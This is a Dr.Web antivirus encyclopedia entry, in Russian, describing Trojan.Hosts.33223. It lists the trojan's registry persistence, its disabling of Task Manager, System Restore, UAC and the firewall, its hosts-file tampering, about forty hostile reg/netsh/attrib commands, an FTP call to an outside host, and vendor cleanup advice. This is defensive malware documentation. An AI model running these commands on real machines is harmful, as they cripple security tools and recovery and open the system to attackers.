Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Hosts.33223

Добавлен в вирусную базу Dr.Web: 2014-10-29

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] '' = '00000001'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft' = '<SYSTEM32>\winlogon.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft_DNS' = '<SYSTEM32>\spool\drivers\svchost.exe'
Изменяет следующие исполняемые системные файлы:
  • %WINDIR%\NOTEPAD.EXE
  • <SYSTEM32>\calc.exe
Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует отображение:
  • скрытых файлов
  • расширений файлов
блокирует запуск следующих системных утилит:
  • Диспетчера задач (Taskmgr)
  • Редактора реестра (RegEdit)
блокирует:
  • Компонент восстановления системы (SR)
  • Центр обеспечения безопасности (Security Center)
Запускает на исполнение:
  • '<SYSTEM32>\net.exe' stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
  • '<SYSTEM32>\netsh.exe' firewall add portopening TCP 21 "Service Filter DNS" ENABLE ALL
  • '<SYSTEM32>\net1.exe' stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
  • '<SYSTEM32>\reg.exe' add "hkcu\software\microsoft\windows\currentVersion\policies\Explorer\RestricRun" /T REG_SZ /d "event.dll" /f
  • '<SYSTEM32>\reg.exe' del "HKEY_CURRENT_USER\Control Panel\Sound" /f
  • '<SYSTEM32>\net1.exe' stop "Centro de Seguridad"
  • '<SYSTEM32>\reg.exe' delete "HKEY_CURRENT_USER\Control Panel\Centro de seguridad" /f
  • '<SYSTEM32>\netsh.exe' firewall add portopening TCP 20 "Service DNS" ENABLE ALL
  • '<SYSTEM32>\netsh.exe' firewall add portopening TCP 29003 "Service Firewall" ENABLE ALL
  • '<SYSTEM32>\net.exe' stop "Centro de Seguridad"
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\ControlSet001\Control\SafeBoot" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
  • '<SYSTEM32>\attrib.exe' +s +h <SYSTEM32>\*.*
  • '<SYSTEM32>\ftp.exe' -s:%WINDIR%\dat.txt ftp.webcindario.com
  • '<SYSTEM32>\ping.exe' -n 60 0.0.0.0
  • '<SYSTEM32>\attrib.exe' +h <SYSTEM32>\spool\drivers\svchost.exe
  • '<SYSTEM32>\attrib.exe' +s +h <SYSTEM32>\AdvancedInstallers\*.*
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer" /v NoSaveSettings /T REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v logonprompt /t REG_SZ /d "kernel.dll" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore" /v NoClose /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\attrib.exe' +s +h <SYSTEM32>\spool\drivers\*.*
  • '<SYSTEM32>\attrib.exe' +s +h <DRIVERS>\*.*
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMsConfig /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft_DNS /t REG_SZ /d "<SYSTEM32>\spool\drivers\svchost.exe" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /t REG_SZ /d "<SYSTEM32>\winlogon.exe" /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\attrib.exe' -s -h <DRIVERS>\etc\hosts
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\server.bat" "<Текущая директория>\""
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "0" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t reg_dword /d "0" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /ve /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' delete "HKCR\Directory\Background\shellex\ContextMenuHandlers\New" /
  • '<SYSTEM32>\reg.exe' delete "HKEY_CURRENT_USER\Control Panel\Herramientas administrativas" /f
  • '<SYSTEM32>\attrib.exe' +s +h <DRIVERS>\etc\hosts
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d "2" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d "0" /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d "1" /f
Изменяет следующие настройки проводника Windows (Windows Explorer):
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
Изменения в файловой системе:
Создает следующие файлы:
  • <SYSTEM32>\WordPad.exe
  • %WINDIR%\dat.txt
  • %TEMP%\1.tmp\server.bat
  • <SYSTEM32>\Dwm.exe
Присваивает атрибут 'скрытый' для следующих файлов:
  • <SYSTEM32>\WordPad.exe
  • <SYSTEM32>\Dwm.exe
Удаляет следующие файлы:
  • <SYSTEM32>\Restore\srframe.mmf
  • %WINDIR%\dat.txt
  • <SYSTEM32>\Restore\srdiag.exe
  • <SYSTEM32>\Restore\MachineGuid.txt
  • <SYSTEM32>\Restore\rstrui.exe
Изменяет файл HOSTS.
Сетевая активность:
Подключается к:
  • 'localhost':1050
  • 'localhost':1052
  • 'localhost':1054
  • 'ft#.##bcindario.com':21
  • 'localhost':1046
  • 'localhost':1048
UDP:
  • DNS ASK ft#.##bcindario.com

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке